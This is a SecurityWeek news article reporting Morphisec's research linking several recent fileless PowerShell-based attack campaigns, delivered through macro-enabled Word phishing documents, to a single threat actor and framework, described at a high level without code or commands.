Virtual Event Today: Supply Chain Security Summit - Join Event In-Progress

Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Recent Fileless Attacks Linked to Single Framework, Researchers Say

A series “fileless attacks” previously attributed to two different threat attackers are now believed to have been carried out by the same actor, from a single attack framework, Israeli security firm Morphisec reveals.

A series “fileless attacks” previously attributed to two different threat attackers are now believed to have been carried out by the same actor, from a single attack framework, Israeli security firm Morphisec reveals.

Starting on March 8, Morphisec researchers began investigating a new fileless attack carried out via a macro-enabled Word document attached to a phishing email that targeted high-profile enterprises. Their investigation led them to the discovery of a sophisticated fileless attack framework associated with multiple recent campaigns.

Last month, Kaspersky Lab uncovered a campaign comprised of more than 140 attacks aimed at banks, telecom companies and government organizations in the United States, the United Kingdom, France, Ecuador, Kenya, Brazil, Spain, Israel and 32 other countries. Common to these attacks was the use of PowerShell scripts to store the malicious code in memory and avoid leaving traces on the compromised machines.

In early March, Cisco detailed a so-called DNSMessenger attack, where threat actors were using a malicious Word document and a PowerShell RAT that could communicate with the command and control (C&C) servers via DNS requests. This sophisticated attack was also completely fileless and invisible to most standard anti-malware defenses.

Another recently spotted fileless attack was installing a PowerShell backdoor dubbed POWERSOURCE onto infected computers, which FireEye linked to a threat group called FIN7. The actor has been targeting organizations in the United States, focusing on personnel that handle filings to the Securities and Exchange Commission (SEC).

According to Morphisec, all these attacks are actually linked to each other, and all had been leveraging the same fileless attack framework that the security company managed to access. In fact, the company says that the same threat group is responsible for all of the attacks.

“Based on our findings, a single group of threat actors is responsible for many of the most sophisticated attacks on financial institutions, government organizations and enterprises over the past few months,” the security researchers reveal. What Morphisec doesn’t say, however, is who these actors are. 

The security researchers even had a brief encounter with these actors, “via the very same PowerShell protocol used for the attack delivery,” which revealed that the hacker was part of an organization targeting specific companies. Following the encounter, the cybercriminals shut down the C&C server, which might have resulted in the loss of foothold in the systems connected to that server.

Similar to previously described campaigns, the attack uses a weaponized Word document that delivers a PowerShell agent capable of opening a backdoor and establishing persistency. In most cases, the actors then move to delivering different PowerShell commands through the C&C, depending on the target.

“For some targets, the attack was fully fileless, eventually delivering a Meterpreter session directly to memory. In other cases, the password-stealer LaZagne Project or another Python executable was delivered and executed. After additional investigation, we identified controllers for different protocols including Cmd, Lazagne, Mimikatz and more,” Morphisec explains.

The malicious Word document claims to be protected and asks the potential victims to enable the content to view it, which allows the macros to run. The included PowerShell executes using Windows Management Instrumentation (WMI), a technique already adopted by various malware families to evade detection.

After several decryption stages, the decrypted PowerShell is saved to the disk. The script observed in one attack was found to be an agent capable of receiving commands from the C&C, execute them and return the results. The malware was also found to lower Office’s macro restrictions to allow for other macro-based documents to be automatically executed.

“In the course of our research the attacker briefly interacted with us. It was clear that a person from the other side was waiting to connect on his Meterpreter session. During the brief interaction, our researchers tried to identify the actor. The attackers immediately blocked the connection and later shut down the C&C server entirely, thereby losing their foothold in the systems of victims connected to that communication server,” Morphisec says.

The security researchers note that the fileless attacks are on the rise and could prove a bigger problem than currently believed. Because the malware resides solely in the memory and commands are delivered directly from the Internet, there is no executables on disk, making the attack basically invisible.

Related: Cybercriminals Target Employees Involved in SEC Filings

Related: Researchers Uncover Sophisticated, Fileless Attack

Related: Legitimate Tools Abused For Fileless Infections

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.

Register

Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cybercrime

More than 3,800 servers around the world have been compromised in recent ESXiArgs ransomware attacks, which also include an improved process.

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.